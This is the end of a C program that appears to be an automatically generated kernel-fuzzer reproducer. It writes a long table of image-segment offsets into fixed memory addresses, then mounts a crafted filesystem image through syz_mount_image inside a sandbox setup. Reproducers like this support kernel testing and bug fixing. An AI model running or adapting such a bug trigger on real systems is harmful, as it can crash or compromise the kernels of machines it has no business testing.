  NONFAILING(*(uint64_t*)0x20000648 = 0x9be0);
  NONFAILING(*(uint64_t*)0x20000650 = 0);
  NONFAILING(*(uint64_t*)0x20000658 = 0);
  NONFAILING(*(uint64_t*)0x20000660 = 0x9de0);
  NONFAILING(*(uint64_t*)0x20000668 = 0);
  NONFAILING(*(uint64_t*)0x20000670 = 0);
  NONFAILING(*(uint64_t*)0x20000678 = 0x9fe0);
  NONFAILING(*(uint64_t*)0x20000680 = 0);
  NONFAILING(*(uint64_t*)0x20000688 = 0);
  NONFAILING(*(uint64_t*)0x20000690 = 0xa3e0);
  NONFAILING(*(uint64_t*)0x20000698 = 0);
  NONFAILING(*(uint64_t*)0x200006a0 = 0);
  NONFAILING(*(uint64_t*)0x200006a8 = 0xa5e0);
  NONFAILING(*(uint64_t*)0x200006b0 = 0);
  NONFAILING(*(uint64_t*)0x200006b8 = 0);
  NONFAILING(*(uint64_t*)0x200006c0 = 0xa7e0);
  NONFAILING(*(uint64_t*)0x200006c8 = 0);
  NONFAILING(*(uint64_t*)0x200006d0 = 0);
  NONFAILING(*(uint64_t*)0x200006d8 = 0xa9e0);
  NONFAILING(*(uint64_t*)0x200006e0 = 0);
  NONFAILING(*(uint64_t*)0x200006e8 = 0);
  NONFAILING(*(uint64_t*)0x200006f0 = 0xabe0);
  NONFAILING(*(uint64_t*)0x200006f8 = 0);
  NONFAILING(*(uint64_t*)0x20000700 = 0);
  NONFAILING(*(uint64_t*)0x20000708 = 0xade0);
  NONFAILING(*(uint64_t*)0x20000710 = 0);
  NONFAILING(*(uint64_t*)0x20000718 = 0);
  NONFAILING(*(uint64_t*)0x20000720 = 0xafe0);
  NONFAILING(*(uint64_t*)0x20000728 = 0);
  NONFAILING(*(uint64_t*)0x20000730 = 0);
  NONFAILING(*(uint64_t*)0x20000738 = 0xb1e0);
  NONFAILING(*(uint64_t*)0x20000740 = 0);
  NONFAILING(*(uint64_t*)0x20000748 = 0);
  NONFAILING(*(uint64_t*)0x20000750 = 0xb3e0);
  NONFAILING(*(uint64_t*)0x20000758 = 0);
  NONFAILING(*(uint64_t*)0x20000760 = 0);
  NONFAILING(*(uint64_t*)0x20000768 = 0xb5e0);
  NONFAILING(*(uint64_t*)0x20000770 = 0);
  NONFAILING(*(uint64_t*)0x20000778 = 0);
  NONFAILING(*(uint64_t*)0x20000780 = 0xb7e0);
  NONFAILING(*(uint64_t*)0x20000788 = 0);
  NONFAILING(*(uint64_t*)0x20000790 = 0);
  NONFAILING(*(uint64_t*)0x20000798 = 0xb9e0);
  NONFAILING(*(uint64_t*)0x200007a0 = 0);
  NONFAILING(*(uint64_t*)0x200007a8 = 0);
  NONFAILING(*(uint64_t*)0x200007b0 = 0xbbe0);
  NONFAILING(*(uint64_t*)0x200007b8 = 0);
  NONFAILING(*(uint64_t*)0x200007c0 = 0);
  NONFAILING(*(uint64_t*)0x200007c8 = 0xbde0);
  NONFAILING(*(uint64_t*)0x200007d0 = 0);
  NONFAILING(*(uint64_t*)0x200007d8 = 0);
  NONFAILING(*(uint64_t*)0x200007e0 = 0xbfe0);
  NONFAILING(*(uint64_t*)0x200007e8 = 0);
  NONFAILING(*(uint64_t*)0x200007f0 = 0);
  NONFAILING(*(uint64_t*)0x200007f8 = 0xc1e0);
  NONFAILING(*(uint64_t*)0x20000800 = 0);
  NONFAILING(*(uint64_t*)0x20000808 = 0);
  NONFAILING(*(uint64_t*)0x20000810 = 0xc3e0);
  NONFAILING(*(uint64_t*)0x20000818 = 0);
  NONFAILING(*(uint64_t*)0x20000820 = 0);
  NONFAILING(*(uint64_t*)0x20000828 = 0xc5e0);
  NONFAILING(*(uint64_t*)0x20000830 = 0);
  NONFAILING(*(uint64_t*)0x20000838 = 0);
  NONFAILING(*(uint64_t*)0x20000840 = 0xc7e0);
  NONFAILING(*(uint64_t*)0x20000848 = 0);
  NONFAILING(*(uint64_t*)0x20000850 = 0);
  NONFAILING(*(uint64_t*)0x20000858 = 0xc9e0);
  NONFAILING(*(uint64_t*)0x20000860 = 0);
  NONFAILING(*(uint64_t*)0x20000868 = 0);
  NONFAILING(*(uint64_t*)0x20000870 = 0xcbe0);
  NONFAILING(*(uint64_t*)0x20000878 = 0);
  NONFAILING(*(uint64_t*)0x20000880 = 0);
  NONFAILING(*(uint64_t*)0x20000888 = 0xcde0);
  NONFAILING(*(uint64_t*)0x20000890 = 0);
  NONFAILING(*(uint64_t*)0x20000898 = 0);
  NONFAILING(*(uint64_t*)0x200008a0 = 0xcfe0);
  NONFAILING(*(uint64_t*)0x200008a8 = 0);
  NONFAILING(*(uint64_t*)0x200008b0 = 0);
  NONFAILING(*(uint64_t*)0x200008b8 = 0xd1e0);
  NONFAILING(*(uint64_t*)0x200008c0 = 0);
  NONFAILING(*(uint64_t*)0x200008c8 = 0);
  NONFAILING(*(uint64_t*)0x200008d0 = 0xd3e0);
  NONFAILING(*(uint64_t*)0x200008d8 = 0);
  NONFAILING(*(uint64_t*)0x200008e0 = 0);
  NONFAILING(*(uint64_t*)0x200008e8 = 0xd5e0);
  NONFAILING(*(uint64_t*)0x200008f0 = 0);
  NONFAILING(*(uint64_t*)0x200008f8 = 0);
  NONFAILING(*(uint64_t*)0x20000900 = 0xd7e0);
  NONFAILING(*(uint64_t*)0x20000908 = 0);
  NONFAILING(*(uint64_t*)0x20000910 = 0);
  NONFAILING(*(uint64_t*)0x20000918 = 0xd9e0);
  NONFAILING(*(uint64_t*)0x20000920 = 0);
  NONFAILING(*(uint64_t*)0x20000928 = 0);
  NONFAILING(*(uint64_t*)0x20000930 = 0xdbe0);
  NONFAILING(*(uint64_t*)0x20000938 = 0);
  NONFAILING(*(uint64_t*)0x20000940 = 0);
  NONFAILING(*(uint64_t*)0x20000948 = 0xdde0);
  NONFAILING(*(uint64_t*)0x20000950 = 0);
  NONFAILING(*(uint64_t*)0x20000958 = 0);
  NONFAILING(*(uint64_t*)0x20000960 = 0xdfe0);
  NONFAILING(*(uint64_t*)0x20000968 = 0);
  NONFAILING(*(uint64_t*)0x20000970 = 0);
  NONFAILING(*(uint64_t*)0x20000978 = 0xe1e0);
  NONFAILING(*(uint64_t*)0x20000980 = 0);
  NONFAILING(*(uint64_t*)0x20000988 = 0);
  NONFAILING(*(uint64_t*)0x20000990 = 0xe3e0);
  NONFAILING(*(uint64_t*)0x20000998 = 0);
  NONFAILING(*(uint64_t*)0x200009a0 = 0);
  NONFAILING(*(uint64_t*)0x200009a8 = 0xe5e0);
  NONFAILING(*(uint64_t*)0x200009b0 = 0);
  NONFAILING(*(uint64_t*)0x200009b8 = 0);
  NONFAILING(*(uint64_t*)0x200009c0 = 0xe7e0);
  NONFAILING(*(uint64_t*)0x200009c8 = 0);
  NONFAILING(*(uint64_t*)0x200009d0 = 0);
  NONFAILING(*(uint64_t*)0x200009d8 = 0xe9e0);
  NONFAILING(*(uint64_t*)0x200009e0 = 0);
  NONFAILING(*(uint64_t*)0x200009e8 = 0);
  NONFAILING(*(uint64_t*)0x200009f0 = 0xebe0);
  NONFAILING(*(uint64_t*)0x200009f8 = 0);
  NONFAILING(*(uint64_t*)0x20000a00 = 0);
  NONFAILING(*(uint64_t*)0x20000a08 = 0xede0);
  NONFAILING(*(uint64_t*)0x20000a10 = 0);
  NONFAILING(*(uint64_t*)0x20000a18 = 0);
  NONFAILING(*(uint64_t*)0x20000a20 = 0xefe0);
  NONFAILING(*(uint64_t*)0x20000a28 = 0);
  NONFAILING(*(uint64_t*)0x20000a30 = 0);
  NONFAILING(*(uint64_t*)0x20000a38 = 0xf1e0);
  NONFAILING(*(uint64_t*)0x20000a40 = 0);
  NONFAILING(*(uint64_t*)0x20000a48 = 0);
  NONFAILING(*(uint64_t*)0x20000a50 = 0xf3e0);
  NONFAILING(*(uint64_t*)0x20000a58 = 0);
  NONFAILING(*(uint64_t*)0x20000a60 = 0);
  NONFAILING(*(uint64_t*)0x20000a68 = 0xf5e0);
  NONFAILING(*(uint64_t*)0x20000a70 = 0);
  NONFAILING(*(uint64_t*)0x20000a78 = 0);
  NONFAILING(*(uint64_t*)0x20000a80 = 0xf7e0);
  NONFAILING(*(uint64_t*)0x20000a88 = 0);
  NONFAILING(*(uint64_t*)0x20000a90 = 0);
  NONFAILING(*(uint64_t*)0x20000a98 = 0xf9e0);
  NONFAILING(*(uint64_t*)0x20000aa0 = 0);
  NONFAILING(*(uint64_t*)0x20000aa8 = 0);
  NONFAILING(*(uint64_t*)0x20000ab0 = 0xfbe0);
  NONFAILING(*(uint64_t*)0x20000ab8 = 0);
  NONFAILING(*(uint64_t*)0x20000ac0 = 0);
  NONFAILING(*(uint64_t*)0x20000ac8 = 0xfde0);
  NONFAILING(*(uint64_t*)0x20000ad0 = 0);
  NONFAILING(*(uint64_t*)0x20000ad8 = 0);
  NONFAILING(*(uint64_t*)0x20000ae0 = 0xffe0);
  NONFAILING(*(uint64_t*)0x20000ae8 = 0);
  NONFAILING(*(uint64_t*)0x20000af0 = 0);
  NONFAILING(*(uint64_t*)0x20000af8 = 0x101e0);
  NONFAILING(*(uint64_t*)0x20000b00 = 0);
  NONFAILING(*(uint64_t*)0x20000b08 = 0);
  NONFAILING(*(uint64_t*)0x20000b10 = 0x103e0);
  NONFAILING(*(uint64_t*)0x20000b18 = 0);
  NONFAILING(*(uint64_t*)0x20000b20 = 0);
  NONFAILING(*(uint64_t*)0x20000b28 = 0x105e0);
  NONFAILING(*(uint64_t*)0x20000b30 = 0);
  NONFAILING(*(uint64_t*)0x20000b38 = 0);
  NONFAILING(*(uint64_t*)0x20000b40 = 0x107e0);
  NONFAILING(*(uint64_t*)0x20000b48 = 0);
  NONFAILING(*(uint64_t*)0x20000b50 = 0);
  NONFAILING(*(uint64_t*)0x20000b58 = 0x109e0);
  NONFAILING(*(uint64_t*)0x20000b60 = 0);
  NONFAILING(*(uint64_t*)0x20000b68 = 0);
  NONFAILING(*(uint64_t*)0x20000b70 = 0x10be0);
  NONFAILING(*(uint64_t*)0x20000b78 = 0);
  NONFAILING(*(uint64_t*)0x20000b80 = 0);
  NONFAILING(*(uint64_t*)0x20000b88 = 0x10de0);
  NONFAILING(*(uint64_t*)0x20000b90 = 0);
  NONFAILING(*(uint64_t*)0x20000b98 = 0);
  NONFAILING(*(uint64_t*)0x20000ba0 = 0x10fe0);
  NONFAILING(*(uint64_t*)0x20000ba8 = 0);
  NONFAILING(*(uint64_t*)0x20000bb0 = 0);
  NONFAILING(*(uint64_t*)0x20000bb8 = 0x111e0);
  NONFAILING(*(uint64_t*)0x20000bc0 = 0);
  NONFAILING(*(uint64_t*)0x20000bc8 = 0);
  NONFAILING(*(uint64_t*)0x20000bd0 = 0x113e0);
  NONFAILING(*(uint64_t*)0x20000bd8 = 0);
  NONFAILING(*(uint64_t*)0x20000be0 = 0);
  NONFAILING(*(uint64_t*)0x20000be8 = 0x115e0);
  NONFAILING(*(uint64_t*)0x20000bf0 = 0);
  NONFAILING(*(uint64_t*)0x20000bf8 = 0);
  NONFAILING(*(uint64_t*)0x20000c00 = 0x117e0);
  NONFAILING(*(uint64_t*)0x20000c08 = 0);
  NONFAILING(*(uint64_t*)0x20000c10 = 0);
  NONFAILING(*(uint64_t*)0x20000c18 = 0x119e0);
  NONFAILING(*(uint64_t*)0x20000c20 = 0);
  NONFAILING(*(uint64_t*)0x20000c28 = 0);
  NONFAILING(*(uint64_t*)0x20000c30 = 0x11be0);
  NONFAILING(*(uint64_t*)0x20000c38 = 0);
  NONFAILING(*(uint64_t*)0x20000c40 = 0);
  NONFAILING(*(uint64_t*)0x20000c48 = 0x11de0);
  NONFAILING(*(uint64_t*)0x20000c50 = 0);
  NONFAILING(*(uint64_t*)0x20000c58 = 0);
  NONFAILING(*(uint64_t*)0x20000c60 = 0x11fe0);
  NONFAILING(*(uint64_t*)0x20000c68 = 0);
  NONFAILING(*(uint64_t*)0x20000c70 = 0);
  NONFAILING(*(uint64_t*)0x20000c78 = 0x121e0);
  NONFAILING(*(uint64_t*)0x20000c80 = 0);
  NONFAILING(*(uint64_t*)0x20000c88 = 0);
  NONFAILING(*(uint64_t*)0x20000c90 = 0x123e0);
  NONFAILING(*(uint64_t*)0x20000c98 = 0);
  NONFAILING(*(uint64_t*)0x20000ca0 = 0);
  NONFAILING(*(uint64_t*)0x20000ca8 = 0x125e0);
  NONFAILING(*(uint64_t*)0x20000cb0 = 0);
  NONFAILING(*(uint64_t*)0x20000cb8 = 0);
  NONFAILING(*(uint64_t*)0x20000cc0 = 0x127e0);
  NONFAILING(*(uint64_t*)0x20000cc8 = 0);
  NONFAILING(*(uint64_t*)0x20000cd0 = 0);
  NONFAILING(*(uint64_t*)0x20000cd8 = 0x129e0);
  NONFAILING(*(uint64_t*)0x20000ce0 = 0);
  NONFAILING(*(uint64_t*)0x20000ce8 = 0);
  NONFAILING(*(uint64_t*)0x20000cf0 = 0x12be0);
  NONFAILING(*(uint64_t*)0x20000cf8 = 0);
  NONFAILING(*(uint64_t*)0x20000d00 = 0);
  NONFAILING(*(uint64_t*)0x20000d08 = 0x12de0);
  NONFAILING(*(uint64_t*)0x20000d10 = 0);
  NONFAILING(*(uint64_t*)0x20000d18 = 0);
  NONFAILING(*(uint64_t*)0x20000d20 = 0x12fe0);
  NONFAILING(*(uint64_t*)0x20000d28 = 0);
  NONFAILING(*(uint64_t*)0x20000d30 = 0);
  NONFAILING(*(uint64_t*)0x20000d38 = 0x131e0);
  NONFAILING(*(uint64_t*)0x20000d40 = 0);
  NONFAILING(*(uint64_t*)0x20000d48 = 0);
  NONFAILING(*(uint64_t*)0x20000d50 = 0x133e0);
  NONFAILING(*(uint64_t*)0x20000d58 = 0);
  NONFAILING(*(uint64_t*)0x20000d60 = 0);
  NONFAILING(*(uint64_t*)0x20000d68 = 0x135e0);
  NONFAILING(*(uint64_t*)0x20000d70 = 0);
  NONFAILING(*(uint64_t*)0x20000d78 = 0);
  NONFAILING(*(uint64_t*)0x20000d80 = 0x137e0);
  NONFAILING(*(uint64_t*)0x20000d88 = 0);
  NONFAILING(*(uint64_t*)0x20000d90 = 0);
  NONFAILING(*(uint64_t*)0x20000d98 = 0x139e0);
  NONFAILING(*(uint64_t*)0x20000da0 = 0);
  NONFAILING(*(uint64_t*)0x20000da8 = 0);
  NONFAILING(*(uint64_t*)0x20000db0 = 0x13be0);
  NONFAILING(*(uint64_t*)0x20000db8 = 0);
  NONFAILING(*(uint64_t*)0x20000dc0 = 0);
  NONFAILING(*(uint64_t*)0x20000dc8 = 0x13de0);
  NONFAILING(*(uint64_t*)0x20000dd0 = 0);
  NONFAILING(*(uint64_t*)0x20000dd8 = 0);
  NONFAILING(*(uint64_t*)0x20000de0 = 0x13fe0);
  NONFAILING(*(uint64_t*)0x20000de8 = 0);
  NONFAILING(*(uint64_t*)0x20000df0 = 0);
  NONFAILING(*(uint64_t*)0x20000df8 = 0x143e0);
  NONFAILING(*(uint64_t*)0x20000e00 = 0);
  NONFAILING(*(uint64_t*)0x20000e08 = 0);
  NONFAILING(*(uint64_t*)0x20000e10 = 0x145e0);
  NONFAILING(*(uint64_t*)0x20000e18 = 0);
  NONFAILING(*(uint64_t*)0x20000e20 = 0);
  NONFAILING(*(uint64_t*)0x20000e28 = 0x147e0);
  NONFAILING(*(uint64_t*)0x20000e30 = 0);
  NONFAILING(*(uint64_t*)0x20000e38 = 0);
  NONFAILING(*(uint64_t*)0x20000e40 = 0x14be0);
  NONFAILING(*(uint64_t*)0x20000e48 = 0);
  NONFAILING(*(uint64_t*)0x20000e50 = 0);
  NONFAILING(*(uint64_t*)0x20000e58 = 0x14fe0);
  NONFAILING(*(uint64_t*)0x20000e60 = 0);
  NONFAILING(*(uint64_t*)0x20000e68 = 0);
  NONFAILING(*(uint64_t*)0x20000e70 = 0x153e0);
  NONFAILING(*(uint64_t*)0x20000e78 = 0);
  NONFAILING(*(uint64_t*)0x20000e80 = 0);
  NONFAILING(*(uint64_t*)0x20000e88 = 0x157e0);
  NONFAILING(*(uint64_t*)0x20000e90 = 0);
  NONFAILING(*(uint64_t*)0x20000e98 = 0);
  NONFAILING(*(uint64_t*)0x20000ea0 = 0x43000);
  NONFAILING(*(uint64_t*)0x20000ea8 = 0);
  NONFAILING(*(uint64_t*)0x20000eb0 = 0);
  NONFAILING(*(uint64_t*)0x20000eb8 = 0x44000);
  NONFAILING(*(uint64_t*)0x20000ec0 = 0);
  NONFAILING(*(uint64_t*)0x20000ec8 = 0);
  NONFAILING(*(uint64_t*)0x20000ed0 = 0x45000);
  NONFAILING(*(uint64_t*)0x20000ed8 = 0);
  NONFAILING(*(uint64_t*)0x20000ee0 = 0);
  NONFAILING(*(uint64_t*)0x20000ee8 = 0x457e0);
  NONFAILING(*(uint64_t*)0x20000ef0 = 0);
  NONFAILING(*(uint64_t*)0x20000ef8 = 0);
  NONFAILING(*(uint64_t*)0x20000f00 = 0x459e0);
  NONFAILING(*(uint64_t*)0x20000f08 = 0);
  NONFAILING(*(uint64_t*)0x20000f10 = 0);
  NONFAILING(*(uint64_t*)0x20000f18 = 0x45be0);
  NONFAILING(*(uint64_t*)0x20000f20 = 0);
  NONFAILING(*(uint64_t*)0x20000f28 = 0);
  NONFAILING(*(uint64_t*)0x20000f30 = 0x45de0);
  NONFAILING(*(uint64_t*)0x20000f38 = 0);
  NONFAILING(*(uint64_t*)0x20000f40 = 0);
  NONFAILING(*(uint64_t*)0x20000f48 = 0x45fe0);
  NONFAILING(*(uint64_t*)0x20000f50 = 0);
  NONFAILING(*(uint64_t*)0x20000f58 = 0);
  NONFAILING(*(uint64_t*)0x20000f60 = 0x46080);
  NONFAILING(*(uint64_t*)0x20000f68 = 0);
  NONFAILING(*(uint64_t*)0x20000f70 = 0);
  NONFAILING(*(uint64_t*)0x20000f78 = 0x46120);
  NONFAILING(*(uint64_t*)0x20000f80 = 0);
  NONFAILING(*(uint64_t*)0x20000f88 = 0);
  NONFAILING(*(uint64_t*)0x20000f90 = 0x461c0);
  NONFAILING(*(uint64_t*)0x20000f98 = 0);
  NONFAILING(*(uint64_t*)0x20000fa0 = 0);
  NONFAILING(*(uint64_t*)0x20000fa8 = 0x46260);
  NONFAILING(*(uint64_t*)0x20000fb0 = 0);
  NONFAILING(*(uint64_t*)0x20000fb8 = 0);
  NONFAILING(*(uint64_t*)0x20000fc0 = 0x46300);
  NONFAILING(*(uint64_t*)0x20000fc8 = 0);
  NONFAILING(*(uint64_t*)0x20000fd0 = 0);
  NONFAILING(*(uint64_t*)0x20000fd8 = 0x463a0);
  NONFAILING(*(uint64_t*)0x20000fe0 = 0);
  NONFAILING(*(uint64_t*)0x20000fe8 = 0);
  NONFAILING(*(uint64_t*)0x20000ff0 = 0x46440);
  NONFAILING(*(uint64_t*)0x20000ff8 = 0);
  NONFAILING(*(uint64_t*)0x20001000 = 0);
  NONFAILING(*(uint64_t*)0x20001008 = 0x464e0);
  NONFAILING(*(uint64_t*)0x20001010 = 0);
  NONFAILING(*(uint64_t*)0x20001018 = 0);
  NONFAILING(*(uint64_t*)0x20001020 = 0x46580);
  NONFAILING(*(uint64_t*)0x20001028 = 0);
  NONFAILING(*(uint64_t*)0x20001030 = 0);
  NONFAILING(*(uint64_t*)0x20001038 = 0x46620);
  NONFAILING(*(uint64_t*)0x20001040 = 0);
  NONFAILING(*(uint64_t*)0x20001048 = 0);
  NONFAILING(*(uint64_t*)0x20001050 = 0x466c0);
  NONFAILING(*(uint64_t*)0x20001058 = 0);
  NONFAILING(*(uint64_t*)0x20001060 = 0);
  NONFAILING(*(uint64_t*)0x20001068 = 0x46760);
  NONFAILING(*(uint64_t*)0x20001070 = 0);
  NONFAILING(*(uint64_t*)0x20001078 = 0);
  NONFAILING(*(uint64_t*)0x20001080 = 0x46800);
  NONFAILING(*(uint64_t*)0x20001088 = 0);
  NONFAILING(*(uint64_t*)0x20001090 = 0);
  NONFAILING(*(uint64_t*)0x20001098 = 0x468a0);
  NONFAILING(*(uint64_t*)0x200010a0 = 0);
  NONFAILING(*(uint64_t*)0x200010a8 = 0);
  NONFAILING(*(uint64_t*)0x200010b0 = 0x46940);
  NONFAILING(*(uint64_t*)0x200010b8 = 0);
  NONFAILING(*(uint64_t*)0x200010c0 = 0);
  NONFAILING(*(uint64_t*)0x200010c8 = 0x47000);
  NONFAILING(*(uint64_t*)0x200010d0 = 0);
  NONFAILING(*(uint64_t*)0x200010d8 = 0);
  NONFAILING(*(uint64_t*)0x200010e0 = 0x48000);
  NONFAILING(*(uint64_t*)0x200010e8 = 0);
  NONFAILING(*(uint64_t*)0x200010f0 = 0);
  NONFAILING(*(uint64_t*)0x200010f8 = 0x88000);
  NONFAILING(*(uint64_t*)0x20001100 = 0);
  NONFAILING(*(uint64_t*)0x20001108 = 0);
  NONFAILING(*(uint64_t*)0x20001110 = 0x89000);
  NONFAILING(*(uint64_t*)0x20001118 = 0);
  NONFAILING(*(uint64_t*)0x20001120 = 0);
  NONFAILING(*(uint64_t*)0x20001128 = 0xff000);
  NONFAILING(*(uint64_t*)0x20001130 = 0);
  NONFAILING(*(uint64_t*)0x20001138 = 0);
  NONFAILING(*(uint64_t*)0x20001140 = 0x100ff1e0);
  NONFAILING(*(uint64_t*)0x20001148 = 0);
  NONFAILING(*(uint64_t*)0x20001150 = 0);
  NONFAILING(*(uint64_t*)0x20001158 = 0xff3e0);
  NONFAILING(*(uint64_t*)0x20001160 = 0);
  NONFAILING(*(uint64_t*)0x20001168 = 0);
  NONFAILING(*(uint64_t*)0x20001170 = 0xff5e0);
  NONFAILING(*(uint64_t*)0x20001178 = 0);
  NONFAILING(*(uint64_t*)0x20001180 = 0);
  NONFAILING(*(uint64_t*)0x20001188 = 0xff7e0);
  NONFAILING(*(uint64_t*)0x20001190 = 0);
  NONFAILING(*(uint64_t*)0x20001198 = 0);
  NONFAILING(*(uint64_t*)0x200011a0 = 0xff9e0);
  NONFAILING(*(uint64_t*)0x200011a8 = 0);
  NONFAILING(*(uint64_t*)0x200011b0 = 0);
  NONFAILING(*(uint64_t*)0x200011b8 = 0xffbe0);
  NONFAILING(*(uint64_t*)0x200011c0 = 0);
  NONFAILING(*(uint64_t*)0x200011c8 = 0);
  NONFAILING(*(uint64_t*)0x200011d0 = 0xfffe0);
  NONFAILING(*(uint64_t*)0x200011d8 = 0);
  NONFAILING(*(uint64_t*)0x200011e0 = 0);
  NONFAILING(*(uint64_t*)0x200011e8 = 0x1ffc00);
  NONFAILING(*(uint64_t*)0x200011f0 = 0);
  NONFAILING(*(uint64_t*)0x200011f8 = 0);
  NONFAILING(*(uint64_t*)0x20001200 = 0x1ffde0);
  NONFAILING(*(uint8_t*)0x2007dc00 = 0);
  NONFAILING(syz_mount_image(0x20000000, 0x20000100, 0x200000, 0xab, 0x20000200,
                             0, 0x2007dc00));
  close_fds();
}
int main(void)
{
  syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
  syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
  syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
  setup_binfmt_misc();
  install_segv_handler();
  use_temporary_dir();
  do_sandbox_none();
  return 0;
}
